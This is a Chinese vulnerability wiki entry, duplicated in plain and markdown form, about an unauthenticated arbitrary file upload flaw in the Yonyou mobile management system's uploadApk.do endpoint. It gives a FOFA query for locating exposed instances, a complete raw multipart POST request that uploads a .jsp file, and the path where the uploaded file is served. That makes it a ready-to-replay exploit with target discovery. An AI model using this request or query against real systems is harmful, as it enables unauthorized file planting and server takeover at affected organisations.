fofamini-wiki

登录白背景

源码

用友移动管理系统uploadApk.do任意文件上传漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

二、影响版本

用友移动系统管理

三、资产测绘

fofa：app="用友-移动系统管理"

登录页面

四、漏洞复现

POST /maportal/appmanager/uploadApk.do HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 128
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"

123
--00content0boundary00--

上传文件位置

http://xx.xx.xx.xx/maupload/apk/a.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/vd8gllm2xoxzhvm3

# 用友移动管理系统uploadApk.do任意文件上传漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

# 二、影响版本

- 用友移动系统管理

# 三、资产测绘

- fofa：`app="用友-移动系统管理"`

![image.png](./img/RN83rPHEXgeRpRKK/1692116981771-495c6b58-bfa3-4130-b18c-43a644f43816-907516.png)

- 登录页面

![image.png](./img/RN83rPHEXgeRpRKK/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-975043.png)

# 四、漏洞复现
```
POST /maportal/appmanager/uploadApk.do HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 128
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"

123
--00content0boundary00--
```
![image.png](./img/RN83rPHEXgeRpRKK/1692117069110-9d713563-16b1-4425-91e5-40e54449b95a-955494.png)
上传文件位置
```
http://xx.xx.xx.xx/maupload/apk/a.jsp
```
![image.png](./img/RN83rPHEXgeRpRKK/1692117107611-d5f9e9da-c302-437f-a132-679a10da4cf6-143635.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vd8gllm2xoxzhvm3>